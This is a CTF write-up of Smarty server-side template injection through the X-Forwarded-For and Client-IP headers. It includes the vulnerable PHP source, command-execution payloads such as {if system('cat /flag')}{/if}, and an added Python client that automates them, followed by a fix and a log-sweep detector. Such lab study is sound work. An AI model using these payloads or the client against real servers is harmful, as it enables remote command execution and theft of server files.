BJDCTF2020-ip的奥秘

1. Homepage

Click the Hint link and view the page source:

```html
<!-- Do you know why i know your ip? -->
```

The hint suggests the challenge revolves around the client IP; the page displays that value in its "IP" output, so the IP-reporting code is where user input reaches the server.

2. Intercept the request

Try template injection through the X-Forwarded-For (XFF) header. Add the header to the intercepted request:

```http
X-Forwarded-For: text
```

Template injection is present. Keeping a plausible address in front of the payload so the page still renders an "IP":

```http
X-Forwarded-For: 127.0.0.1{{system('ls')}}
```

```http
X-Forwarded-For: 127.0.0.1{{system('cat /flag')}}
```

3. Analyzing the SSTI

Now read flag.php to locate the injection point:

```http
X-Forwarded-For: 127.0.0.1{{system('cat flag.php')}}
```

Source:

```php
<?php
require_once('header.php');
require_once('./libs/Smarty.class.php');
$smarty = new Smarty();
// Client-IP is consulted first, then X-Forwarded-For; both are
// request headers the client controls, REMOTE_ADDR is the fallback.
if (!empty($_SERVER['HTTP_CLIENT_IP']))
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ip=$_SERVER['REMOTE_ADDR'];
}
//$your_ip = $smarty->display("string:".$ip);
echo "<div class=\"container panel1\">
<div class=\"row\">
<div class=\"col-md-4\">
</div>
<div class=\"col-md-4\">
<div class=\"jumbotron pan\">
<div class=\"form-group log\">
<label><h2>Your IP is : ";
// Sink: the header value is used as the template source itself.
$smarty->display("string:".$ip);
echo " </h2></label>
</div>
</div>
</div>
<div class=\"col-md-4\">
</div>
</div>
</div>";
?>
```

The SSTI sink is this line:

```php
$smarty->display("string:".$ip);
```

The header value is concatenated into the template source (Smarty's `string:` resource) with no filtering, so whatever the client puts in `Client-IP` or `X-Forwarded-For` is compiled and rendered as a Smarty template. Because `Client-IP` is checked first, it is the header to use when a reverse proxy overwrites `X-Forwarded-For`. The fix is to validate the value (for example `filter_var($ip, FILTER_VALIDATE_IP)`) and to hand it to the template as data rather than as template source, e.g. `$smarty->assign('ip', $ip)` with `{$ip|escape}` in a fixed template.
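A small client for the flow described above, written as an added example rather than code from the original writeup. It assumes a target that reflects the first non-empty of `Client-IP` / `X-Forwarded-For` into a Smarty `string:` template and echoes it between `Your IP is : ` and ` </h2>`, exactly like the flag.php above; `TARGET_URL` is a placeholder and the sample response body is constructed for offline use.

```python
"""Smarty SSTI client for the header-reflecting flag.php discussed above.
Added example, not part of the original writeup. TARGET_URL is a placeholder."""
import re
import urllib.request
from typing import Dict, Optional

TARGET_URL = "http://example.invalid/flag.php"  # placeholder, assumed

# Marker text taken from the echo statements in flag.php above.
OUTPUT_RE = re.compile(r"Your IP is : (.*?) </h2>", re.DOTALL)


def smarty_exec(cmd: str) -> str:
    """Wrap a shell command in the {if system('...')}{/if} payload form from
    the writeup. Single quotes would terminate the Smarty string literal,
    so they are rejected rather than escaped."""
    if "'" in cmd:
        raise ValueError("single quotes are not supported in the payload")
    return "{if system('%s')}{/if}" % cmd


def build_headers(payload: str, header: str = "X-Forwarded-For") -> Dict[str, str]:
    """Prefix the payload with a plausible address, as the writeup does.
    flag.php checks Client-IP before X-Forwarded-For, so pass header="Client-IP"
    when an upstream proxy rewrites X-Forwarded-For."""
    return {header: "127.0.0.1" + payload}


def extract_output(html: str) -> Optional[str]:
    """Return the rendered template (IP prefix plus command output), or None."""
    m = OUTPUT_RE.search(html)
    return m.group(1) if m else None


def exploit(cmd: str, url: str = TARGET_URL, header: str = "X-Forwarded-For") -> Optional[str]:
    """Send one request with the payload header and return the rendered output
    (requires network access to the target)."""
    req = urllib.request.Request(url, headers=build_headers(smarty_exec(cmd), header))
    with urllib.request.urlopen(req, timeout=10) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return extract_output(body)


# Constructed response body mimicking flag.php's markup; the directory
# listing is made up for the offline check.
SAMPLE_RESPONSE = (
    '<div class="form-group log">\n'
    "<label><h2>Your IP is : 127.0.0.1flag.php\nheader.php\nindex.php\n </h2></label>\n"
    "</div>"
)

if __name__ == "__main__":
    print(extract_output(SAMPLE_RESPONSE))
```

`system()` writes the command output while the template renders, so the captured text is the literal `127.0.0.1` prefix followed by the command output; `extract_output` returns that span unmodified.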

4. Smarty injection

Smarty injection payloads:

```smarty
{if phpinfo()}{/if}
{if system('ls')}{/if}
{readfile('/flag')}
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if}
```

The `{if ...}{/if}` form works because the PHP function call is evaluated as the condition; `system()` and `show_source()` print their output as a side effect while the template renders, so the result lands in the page even though the `{if}` body is empty.
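The check flag.php should have applied, and a log sweep that uses the same check to spot these payloads after the fact. This is an added example, not code from the original writeup: it assumes the proxy headers are logged in two extra quoted fields at the end of an Apache combined log line (`"%{X-Forwarded-For}i" "%{Client-IP}i"`), and the sample log lines are constructed.

```python
"""Validate proxy IP headers and sweep a log for Smarty SSTI attempts.
Added example, not part of the original writeup. Log format is assumed."""
import ipaddress
import re
from typing import List, Tuple


def is_ip_list(value: str) -> bool:
    """True only if value is one or more IPv4/IPv6 addresses separated by
    commas, the shape a legitimate X-Forwarded-For chain has."""
    parts = [p.strip() for p in value.split(",")]
    if any(p == "" for p in parts):
        return False
    try:
        for p in parts:
            ipaddress.ip_address(p)
    except ValueError:
        return False
    return True


# Smarty's default delimiters; any {...} in an IP header is hostile.
SMARTY_TAG_RE = re.compile(r"\{[^}]*\}")


def classify(value: str) -> str:
    """'ok' for an absent header or a valid IP list, 'ssti' when Smarty
    delimiters are present, otherwise 'suspect'."""
    if value in ("", "-"):
        return "ok"
    if is_ip_list(value):
        return "ok"
    if SMARTY_TAG_RE.search(value):
        return "ssti"
    return "suspect"


# Combined log line followed by the two quoted header fields (assumed format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \S+ "[^"]*" "[^"]*" '
    r'"(?P<xff>[^"]*)" "(?P<cip>[^"]*)"$'
)

# Constructed sample lines: one clean proxy chain, one XFF payload, one
# Client-IP payload, one malformed value.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2020:12:00:00 +0000] "GET /flag.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0" "203.0.113.7, 10.0.0.5" "-"
10.0.0.5 - - [01/Jan/2020:12:00:01 +0000] "GET /flag.php HTTP/1.1" 200 1300 "-" "curl/7.68.0" "127.0.0.1{{system('ls')}}" "-"
10.0.0.5 - - [01/Jan/2020:12:00:02 +0000] "GET /flag.php HTTP/1.1" 200 1350 "-" "curl/7.68.0" "10.0.0.5" "127.0.0.1{if system('cat /flag')}{/if}"
10.0.0.5 - - [01/Jan/2020:12:00:03 +0000] "GET /flag.php HTTP/1.1" 200 1240 "-" "curl/7.68.0" "not-an-ip" "-"
'''.strip().splitlines()


def sweep(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (source, header, verdict, value) for every header value that
    is not a clean IP list. Lines that do not match the format are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name in ("xff", "cip"):
            verdict = classify(m.group(name))
            if verdict != "ok":
                hits.append((m.group("src"), name, verdict, m.group(name)))
    return hits


if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOG):
        print(hit)
```

`is_ip_list` is the whole fix on the server side: a value that passes it cannot contain Smarty delimiters, so it is safe to display (and still better assigned as a variable than concatenated into the template source). The sweep flags both the XFF and the Client-IP path, which matters because flag.php reads Client-IP first.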